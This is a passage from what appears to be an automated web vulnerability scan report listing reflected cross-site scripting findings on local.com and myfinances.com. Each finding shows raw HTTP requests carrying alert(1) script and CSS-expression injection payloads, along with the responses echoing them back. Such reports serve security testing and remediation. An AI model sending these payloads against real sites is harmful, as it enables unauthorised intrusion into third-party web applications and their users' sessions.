Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events/category/sports/dallas-tx.aspx?66d6b'-alert(1)-'8080df3d42=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 89105
Date: Thu, 03 Feb 2011 16:49:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:49:18 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 89105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Sports Events | Find S
...[SNIP]...
<a href="/events/events_map.aspx?location=dallas%2c+tx&category=sports&66d6b'-alert(1)-'8080df3d42=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);">
...[SNIP]...

4.475. http://www.local.com/results.aspx [cid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d27c6"%3b652d94a4b4b was submitted in the cid parameter. This input was echoed as d27c6";652d94a4b4b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /results.aspx?keyword=banks&cid=506d27c6"%3b652d94a4b4b&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 131999
Date: Thu, 03 Feb 2011 15:56:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=0tqwfcmc1mz4bv45earm1z55; path=/; HttpOnly
Set-Cookie: localcom=cid=506d27c6";652d94a4b4b&loc=Dallas%2c+TX&kw=banks&uid=a555a31b-b16a-44e4-835f-482623ce13b9&expdate=634349085792409448&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506d27c6%22%253b652d94a4b4b%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:19 GMT; path=/
Set-Cookie: localcom_s=cid=506d27c6";652d94a4b4b&exp=634323183792409448; domain=local.com; expires=Thu, 03-Feb-2011 16:26:19 GMT; path=/
Content-Length: 131999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
prop1="banks";
s.prop2="";
s.prop4="Dallas, TX";
s.prop5="v3:Businesses - SERP - SEM";
s.prop8="";
s.campaign = "506d27c6";652d94a4b4b";
s.eVar1="v3:Businesses - SERP - SEM";
s.eVar5="v3:Businesses - SERP - SEM";
s.eVar6="Retail Banks";
s.eVar11="506d27c6";652d94a4b4
...[SNIP]...

4.476. http://www.local.com/results.aspx [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c80ba"style%3d"x%3aexpression(alert(1))"45503434253 was submitted in the cid parameter. This input was echoed as c80ba"style="x:expression(alert(1))"45503434253 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=banks&cid=506c80ba"style%3d"x%3aexpression(alert(1))"45503434253&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 133517
Date: Thu, 03 Feb 2011 15:56:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; path=/; HttpOnly
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; domain=local.com; expires=Thu, 03-Feb-2011 16:26:17 GMT; path=/
Content-Length: 133517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=banks&cid=506c80ba"style="x:expression(alert(1))"45503434253&client=ca-dp-r-mark03_3ph_js&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

4.477. http://www.local.com/results.aspx [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a134f"style%3d"x%3aexpression(alert(1))"fccc9411126 was submitted in the client parameter. This input was echoed as a134f"style="x:expression(alert(1))"fccc9411126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f"style%3d"x%3aexpression(alert(1))"fccc9411126 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 131540
Date: Thu, 03 Feb 2011 15:56:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=en03gt2mbtrg5hymvlucfg2l; path=/; HttpOnly
Set-Cookie: localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=41e9b545-7b15-424c-972c-65baecb81534&expdate=634349085968705455&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_jsa134f%22style%253d%22x%253aexpression(alert(1))%22fccc9411126&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:36 GMT; path=/
Set-Cookie: localcom_s=cid=506&exp=634323183968705455; domain=local.com; expires=Thu, 03-Feb-2011 16:26:36 GMT; path=/
Content-Length: 131540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f"style="x:expression(alert(1))"fccc9411126&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

4.478. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a378"style="x:expression(alert(1))"043ffc8a60a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js&9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 130504
Date: Thu, 03 Feb 2011 15:56:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=bzp0h255qcweve45j0rd4z55; path=/; HttpOnly
Set-Cookie: localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=639a705c-136b-485f-8a3e-16b57e26ba7b&expdate=634349086150332423&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_js%269a378%22style%253d%22x%253aexpression(alert(1))%22043ffc8a60a%3d1&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:55 GMT; path=/
Set-Cookie: localcom_s=cid=506&exp=634323184150332423; domain=local.com; expires=Thu, 03-Feb-2011 16:26:55 GMT; path=/
Content-Length: 130504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js&9a378"style="x:expression(alert(1))"043ffc8a60a=1&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

4.479. http://www.local.com/topics/ [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /topics/

Issue detail

The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f6f"%3bb0022a17af6 was submitted in the keyword parameter. This input was echoed as b0f6f";b0022a17af6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topics/?topic=food&keyword=foodb0f6f"%3bb0022a17af6 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 33965
Date: Thu, 03 Feb 2011 16:51:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:21 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&topics.kw=foodb0f6f%22%3bb0022a17af6; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 33965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cooking, Nutrition and Food A
...[SNIP]...
<script type="text/javascript">
s.pageName="Topics - Landing - Food";
s.prop1="foodb0f6f";b0022a17af6";
s.prop2="";
s.prop4="Dallas, TX";
s.prop5="v3:Topics - Landing - Food";
s.prop8="Organic";
s.campaign = "506c80ba
...[SNIP]...

4.480. http://www.local.com/ver1.0/Direct/Jsonp [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /ver1.0/Direct/Jsonp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 8cbb2<script>alert(1)</script>2eab8d1e87a was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22UpdateArticleAction%22%3A%7B%22Categories%22%3A%5B%5D%2C%22OnPageTitle%22%3A%22Hillcrest%20Bank%20%2528Dallas%252C%20TX%2529%22%2C%22OnPageUrl%22%3A%22104826937%7CHillcrest%20Bank%7CDallas%252C%20TX%22%2C%22Section%22%3A%7B%22Section%22%3A%7B%22Name%22%3A%22Dallas%2C%20TX%22%7D%7D%2C%22UpdateArticle%22%3A%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22104826937%22%7D%7D%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback08cbb2<script>alert(1)</script>2eab8d1e87a&pcksl=http%3A%2F%2Fwww.local.com&pckdt=local.com HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; ym_pop_freq1421534=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL02proddmlocal
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript; charset=utf-8
Date: Thu, 03 Feb 2011 16:06:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL02proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=663488778.20480.0000; path=/ ; domain=local.com; path=/
Content-Length: 188

RequestBatch.callbacks.daapiCallback08cbb2<script>alert(1)</script>2eab8d1e87a({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"02/03/2011 08:06:04:885 AM"}],"Responses":[]}});

4.481. http://www.local.com/ver1.0/ReviewPage.app [articleKey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /ver1.0/ReviewPage.app

Issue detail

The value of the articleKey request parameter is copied into the HTML document as plain text between tags. The payload 76469<script>alert(1)</script>5cd27d00a02 was submitted in the articleKey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/ReviewPage.app?onPage=1&reviewsPerPage=10&articleKey=10482693776469<script>alert(1)</script>5cd27d00a02&pcksl=http%3A%2F%2Fwww.local.com&pckdt=local.com&rand=1296748922751 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; ym_pop_freq1421534=1; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Vary: Content-Encoding
Cache-Control: private
Content-Type: application/json
Date: Thu, 03 Feb 2011 16:06:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Content-Length: 657

{
"ReviewsPage": {
"SortType": {
"SortOrder": "Descending",
"ObjectType": "Models.System.Sorting.TimestampSort"
},
"AverageReviewRating": 0.0,
"TotalItems": 0,
"ReviewOnKey": {
"Key": "10482693776469<script>alert(1)</script>5cd27d00a02",
"ObjectType": "Models.External.ExternalResourceKey"
},
"ItemsPerPage": 10,
"ObjectType": "Responses.Reactions.ReviewsPageResponse",
"Items": [],
"OneBasedOnPage": 1,
...[SNIP]...

4.482. http://www.myfinances.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af164"><script>alert(1)</script>bfea6dcd612 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?af164"><script>alert(1)</script>bfea6dcd612=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:03:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:03:03 GMT
Content-Length: 17806
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<input type="hidden" name="back" value="/?af164"><script>alert(1)</script>bfea6dcd612=1" />
...[SNIP]...

4.483. http://www.myfinances.com/blog.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b441b'><script>alert(1)</script>2d6ce3f1de5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog.html?b441b'><script>alert(1)</script>2d6ce3f1de5=1 HTTP/1.1
Host: www.myfinances.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
